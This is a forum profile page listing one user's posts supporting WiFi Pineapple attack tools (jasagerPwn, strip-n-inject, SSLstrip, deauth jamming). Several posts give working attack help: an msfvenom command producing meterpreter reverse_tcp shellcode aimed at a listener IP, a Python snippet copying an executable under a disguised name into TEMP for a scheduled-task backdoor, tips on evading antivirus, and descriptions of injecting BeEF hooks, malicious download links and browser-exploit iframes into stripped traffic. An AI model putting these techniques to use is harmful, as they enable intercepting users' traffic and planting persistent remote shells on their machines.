leg3nd
-
Posts
119 -
Joined
-
Last visited
-
Days Won
4
Posts posted by leg3nd
-
-
I'm having trouble with the jammer.
It works fine in non-populated areas, but it only works once in populated areas. And by unpopulated, I mean with about 5 clients. I did change the code so it kills all aireplay-ng processes every 10 seconds, but it still works in non-populated areas. Strange.
Here is the modified start_jammer.sh: http://pastebin.com/J7jmdtvx
Edit: I modified it so it wouldn't crash.
Your post doesn't really explain what you see when your problem occurs. DeAuth is always a balance of power consumption/stability when dealing with a large number of clients.
That being said - I've used the aireplay-ng version with over 30 clients without an issue in the past.
-
Running the BeEf server directly on the pineapple would be challenging because of the hardware requirements.. theoretically you could do it directly on the pineapple but it would affect the performance of your clients.
You can use my script in my comment to use BeEF (jasagerPwn). I use the strip-n-inject module to prevent HTTPS and inject the BeEF hook into all the clients HTTP requests. This provides a BeEF hook that's persistent as long as the client is on the pineapple. In this implementation I have the BeEF server running on the attacker machine.. this makes the installation and performance of the attack much better.
-
Fixed a bug with DNS spoof's "spoofhosts" file location. On the newer firmware it was causing many of the attacks not to function properly. Please be sure you're running the latest firmware then update the script.
./jasagerPwn -u
Also thinking about adding a client heart-bleed module here because I'm bored: https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
Anyone interested in that?
-
I notice there's a lot to talk about SSLStrip.
just for example the droid application for facebook, has anyone had success on preventing ssl on droid applications?
It really depends on the implementation of the specific application. For example, if the application initiated the connection on 80 and then was redirected (HTTP 301/302) to 443 - then yes it would work.
However most application development teams, especially the size and maturity of Facebook, would likely just initiate the connection straight to 443. This is the kind of silly mistake of thing that Secure Development Life Cycles look to prevent.
-
Good afternoon,
I've been fooling around with the pineapple for a little while and am unable to get the Jammer infusion to work correctly.
I was reading that wlan1 on the pineapple is the one that can be used to perform deauth attacks.
So the first thing that I do is click on the Jammer Tile
I then select wlan1 as my interface > start monitor
choose mon0 as my monitor interface
I go into some of the options like how many deauth packets to send and I usually choose 5
I whitelist the AP that the pineapple is connected to thru wlan0 ( so that clients deauth'd will reconnect through the Pineapple )
Then I click on start,
when it starts I can see on my computer that there is no access points available anymore
but then, the pineapple starts acting funny (the blue light (wlan0) AND red light (wlan1)) both turn off, either it turns off completely and reboots itself.
I'm using method aireplay-ng, have yet to try MDK3
Am I doing something wrong?
I can't find much support on this.
I appreciate any help you can give me.
What is your power source?
Deauthentication is a power intensive process and unless you're on a well distributed, stable power source you could certainly have some instability and reboots.
-
Is this new script bypass HSTS protection?
It was not designed with that in mind. I can look into the possibility of bypassing it if that is of interest to you.
-
Hey there,
a quick basic question, since I failed to get a working internet connection for the pineapple when running jasagerpwn today:
The pineapple (mark IV) is connected at eth0 of my kali machine, which is connected to the net via wifi (wlan0), which I set up in the script. Do I need to disable the pineapples routing for the script to run (like with the first jasagerpwn script)? Or is it just setting a static ip, running the wp4.sh with that IP and finally starting jasagerpwn?
Thanks in advance,
Carni
PS:
Just change this part in the script.
This script is a bit different then the original jasagerPwn (which was very poorly designed). The script will not touch any network configurations regarding ICS because it's assumed that the internet connection will be configured on the pineapple directly (3G Dongle, WiFi ICS on Pinepple, etc).
I'm sure you can run the internet through your laptop with the normal Linux ICS script. Since Hak5 did such a great job making general operating much more user friendly I didn't feel it was necessary to include any ICS configuration in the script.
-
This looks great. I'm going to try it out on my pen test lab at home in coming days.
A quick question about deauth... in jasagerPwn the first item in CONFIGURATION / VARIABLES is :-
# [System Information]deauth_interface="wlan0" # Interface for local deauthentication attacks
I'd prefer to use my Alfa 036H plugged into the WiFi Pineapple as wlan2. Does jasagerPwn allow you to select which interface you want to use to deauth clients?
I know I'll find this out when I get everything set up properly... :-)
Regards,
Lunokhod
Sorry if the comment was unclear but that is intended for local deauthentication attacks (local being the attacker computer). If you would like to execute deauth attack from the pineapple then I recommend using Whistle Master's "WiFi Jammer" infusion. I tend to perform deauth attack from both depending on the physical situation )interference and signal strengths).
-
So I've been trying to install JasagerPwn on the latest firmware, and it doesnt look like its gonna work. I got it to install on Kali 1.05 ok. but I can't seem to get it from my Kali box to the pineapple. I reall like the whole concept/idea of JasagerPwn Reborn. It sounds so bad ass. Do you think that i could inject those same exploits/payloads mentioned in this post with "strip-n-inject" ? sorry for askin, but im at my wits end here. I'v been reading this post all night and still havent had any luck.anyways, please hit me up.
I'm going to need a bit more information. I haven't had much time to try the new pineapple firmwares, but I would guess it should still work fine. There really isn't much to "install" on the pineapple other than the infusions (dnsspoof, sslstrip, strip-n-inject) which the attack vectors utilize.
What is the problem that's occurring? What steps should I take to reproduce your problem?
-
I've got another question, is there a way to execute in memory bypass_uac as well?
Its theoretically possible. Any code that can be executed from disk can be turned into shellcode and executed in memory.
This is a known, working UAC bypass by Dave Kennedy: https://www.trustedsec.com/files/bypassuac.zip
It will need to be modified to run in memory.
-
Naw not anytime soon.. I can hack things together but don't care to spend my time doing web development.
Standardization is a good thing imo. No point in reinventing the wheel.
I guess if there became a need I might do it.. but im not much of a GUI fan to begin with.. I barley use it in my pentests to begin with.
-
Hi leg3nd, good job.
Take a look to this repo: https://github.com/xtr4nge/sslstrip
Response tamperer support (@kkotowicz) and Code Injection was implemented (@xtr4nge) in the same SSLStrip fork.
Options: -t <config>, --tamper <config> Enable response tampering with settings from <config>. -i , --inject Inject code into HTML pages using a text file (default inject.txt)
For code injection you can use the -i option and the file path, so you don't need to use the hardcoded file path/name.
Also you can implement more advanced attacks using the -t option.
I'm adding these functionalities to my project this week.
regards,
Very cool.
Looks like the primary difference here is that you can target specific sites with specific code, different content-types, etc. I'll swap this infusion over to this port of SSLstrip to allow for more granular attacks.
Thanks!
-
Awesome, thanks Whistle Master!
-
Dont know that the exception matters; it's loading my meterpreters just fine.
Yes.. this is using 32 bit shellcode and is compiled into a 32 bit binary that can be used on both 32/64 bit platforms. You'll need to change things if you want it to be purely 64 bit - but that will not work on 32 bit platforms.. so I don't get what you're trying to do.
I also don't see much point in deploying this as a python script since 99% of people don't have python installed.
-
Whoops - that's the code from the ClickJacking attack that's implemented in JasagerPwn. It basically will replace all links on the page with a download to a malicous executable as a user browses. The main purpose I made this infusion was for the attack vectors I have in JasagerPwn.
The update mainly added some failsafe code to ensure the iptables commands are removed correctly and added additional verbosity to the log output.
Feel free to replace it with: <script>window.alert("Pineapple!")</script> for the simple popup window.
-
I doubt it's a problem with the shellcode but i'll give it a try now.
If i can't solve messing around i'll wait for your update :P I'll let you know if i find out something.
Thanks again, i owe you one!
Updated. I changed out the process injection for a simpler direct shellcode execution.. this will work on both 32 and 64 bit Windows 7 and is much more stable since it doesn't touch external memory or process space.
If you want to migrate you can just use metasploit for that. I believe they have a new "set PrependMigrate true" option, or AutoRunScript "migrate -f -k".
Let me know how this one works for you.
EDIT: On an unrelated note - I just added in a Metasploit BrowserPwn invisible iFrame injection attack. This will allow the victim to browser normally while they are sslstriped and have exploits injected into the browser in the background.
-
Not sure on the top of my head.. I'll do some playing with it this weekend and check if its a memory manipulation issue. I've never tested this with 64 bit shellcode so it could be problematic.
I generated both 32 bit and 64 bit shellcode with your address. The 32 bit is 389 characters and the 64 bit is 565 characters.
Here is the shellcode I generated (with your IPs): http://paste.pound-python.org/show/McfvJRisjSZYcjbYVfm0/
If this doesn't work just keep poking at it or wait until I release a new version this weekend.
-
Yup, but its not really persistent because if someone deletes the .py (or even the .exe for that matter), the backdoor won't start again. I was asking if there is a way to move the inject.py somewhere safe (i.e. documents folder) without triggering antiviruses :P
Thanks for your patience :PP
The script can copy the current executable to the temporary directory with some name like WRE8285.exe and then use THAT as the schtasks backdoor.
I have that currently implemented in the powershell-https payload.. here is the relevant code:
exe_loc = str(sys.executable) backdoor_loc = os.getenv('TEMP') + '\\' + "WRE8284.exe" proc = subprocess.Popen("copy /y %s %s" %(exe_loc, backdoor_loc), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)Then in the XML file I'm generating, replace this:
....." + exe_loc + ".....
with this:
....." + backdoor_loc + ".....
This is the file you can reference that already does this (ill add this to inject.py with other improvements later on): https://code.google.com/p/jasagerpwn-reborn/source/browse/trunk/resources/meterpreter_powershell-HTTPS/powershell-https.py
A cleartext python script will always have a chance to trigger AV. Compiling it will help a lot with that.
-
Yeah currently it will think the python.exe is the current executable.. which technically it is since you're running it through the interpreter.
This was designed to be ran as an EXE for obvious reasons, in which case that line is fine.
However, if you insist on using the interpreter your change will work:
exe_loc = "C:\Users\myusername\Desktop\inject.py"
-
I won't be offically supporting the MK4.
Currently, some of the attacks will work such as Fake Update and Java Applet Redirect - however there is no "Strip-N-Inject" infusion for the MK4 so none of those attacks will work. When I'm doing future development for JasagerPwn it will be targeted for the MK5 and won't have much consideration for backwards compatibility with the MK4.
-
Hmmm... yes I understand the issue here. The problem is that injecting 32 bit shellcode into a 64 bit process will fail (explorer.exe is 64 bit).
Theres 2 potential solutions here:
- Choose a 32 bit process: Even though the machine is 64-bit, it should work with a 32bit process.
- Look in task manager for a process with *32 on the end of it and try using that process instead. The problem here is that most default processes on a 64 bit systems will be 64 bit.
- Use 64bit shellcode: You can modify that command a bit to generate 64 bit shellcode.
data=$(msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.249.128 LPORT=587 -f c | tr -d '\"' | tr -d '\n' | awk -F= '{print $2}' | awk '{print $1}') ; python -c 'import base64;print base64.encodestring("'$data'").replace("\n","")'This will work for your testing purposes and for exploited a targeted architecture.. but this is a crappy solution at the end of the day since it's not architecture agnostic. I'll come up with a full-proof solution this weekend... just need to brainstorm a bit.
- Choose a 32 bit process: Even though the machine is 64-bit, it should work with a 32bit process.
-
hups, your infusion is working like a charm, also the password sniffing but I am unable to clear the sslstrip issue.
anyway: <script>window.alert("You have new e-mail messages!");</script> looks cool :-)
I'm not into the injection code. I have programming next year and hope to learn some more then. At the moment its all networking and windows server at school, wich is also taking a lot of time now...
Got to make choices man but love your infusion ;-)
The great thing is that you dont need to know programing to mount these attacks. Thats what this script is for: https://forums.hak5.org/index.php?showtopic=30588
It will automate many advanced attack vectors that utilize code injection for you - generally with the purpose of returning a meterpreter shell.
Add logging and I won't have a use for the SSLStrip infusion.
I guess I could add logging/filtering to this... but that wasn't the original purpose of the infusion. If the SSLstrip module doesn't get updated then I'll just grab that logic and add it to this so it can be used for both sniffing and code injection.
-
If it doesn't "just work", which it should with the install button, then you might need to SSH to debug it.
I'm sure you can theoretically do that but going into the "Injection Code" tab, removing all code, and saving it. This infusion is really not meant for sniffing passwords though - it lacks filters, log saving, less verbose output, etc. This infusion is meant for injecting code for more advanced attack vectors.
If you have this infusion working, you should be able to sniff passwords with the normal "sslstrip" infusion as they use the same dependencies.
-
Cool, please report any bugs so I can get em fixed up.
This is my advice with the SSLstrip issues:
- If SSLStrip is already working for you: don't press install because it will "just work" regardless if its "not installed"
- If SSLstrip is not working: The "Install" will likely fix it based on previous forum posts of SSLstrip installtions
This is basically the install script if you feel like trying it manually:
opkg remove twisted-web --force-depends && opkg update && opkg install twisted-web if [ ! -e "/usr/lib/python2.7/site-packages/OpenSSL" ]; then ln -s /sd/usr/lib/python2.7/site-packages/OpenSSL /usr/lib/python2.7/site-packages/ fi if [ ! -e "/usr/lib/python2.7/site-packages/twisted/web" ]; then ln -s /sd/usr/lib/python2.7/site-packages/twisted/web /usr/lib/python2.7/site-packages/twisted/ fi
[Support] strip-n-inject
in Mark V Infusions
Posted
Same results when you try it from the infusion UI?
An easy way to test if the strip-n-inject infusion is working is to inject a simple popup box:
<script>alert("It worked!!");</script>Make sure you're not browsing on HTTPS directly because you cannot inject into encrypted HTTP traffic.